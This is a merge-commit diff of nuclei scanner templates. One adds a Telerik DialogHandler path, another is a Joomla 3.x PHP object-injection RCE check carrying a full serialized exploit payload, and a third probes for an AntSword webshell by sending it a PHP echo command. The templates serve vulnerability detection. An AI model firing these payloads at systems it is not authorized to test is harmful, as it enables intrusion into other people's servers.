Merge branch 'dashboard' of https://github.com/MostInterestingBotInTheWorld/nuclei-templates into dashboard

technologies/telerik/telerik-dialoghandler-detect.yaml

@@ -2,7 +2,7 @@ id: telerik-dialoghandler-detect
 
 info:
   name: Detect Telerik Web UI Dialog Handler
-  author: organiccrap,zhenwarx
+  author: organiccrap,zhenwarx,nielsing
   severity: info
   reference:
     - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
@@ -28,6 +28,7 @@ requests:
       - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
       - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
       - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
+      - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1'
 
     stop-at-first-match: true
     matchers-condition: and

vulnerabilities/joomla/rusty-joomla.yaml

@@ -0,0 +1,43 @@
+id: rusty-joomla
+
+info:
+  name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS
+  author: leovalcante,kiks7
+  severity: critical
+  description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.
+  reference:
+    - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
+    - https://github.com/kiks7/rusty_joomla_rce
+  tags: joomla,rce,unauth,php,cms,objectinjection
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    extractors:
+      - type: regex
+        name: csrf
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
+
+    matchers:
+      - type: word
+        words:
+          - "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
+          - "Failed to decode session object"
+        condition: and

vulnerabilities/other/antsword-backdoor.yaml

@@ -0,0 +1,28 @@
+id: antsword-backdoor
+
+info:
+  name: Antsword backdook
+  author: ffffffff0x
+  severity: critical
+  description: 蚁剑「绕过 disable_functions」插件生成的 shell
+  reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
+  tags: backdoor,antsword
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/.antproxy.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: 'ant=echo md5("antproxy.php");'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "951d11e51392117311602d0c25435d7f"
+
+      - type: status
+        status:
+          - 200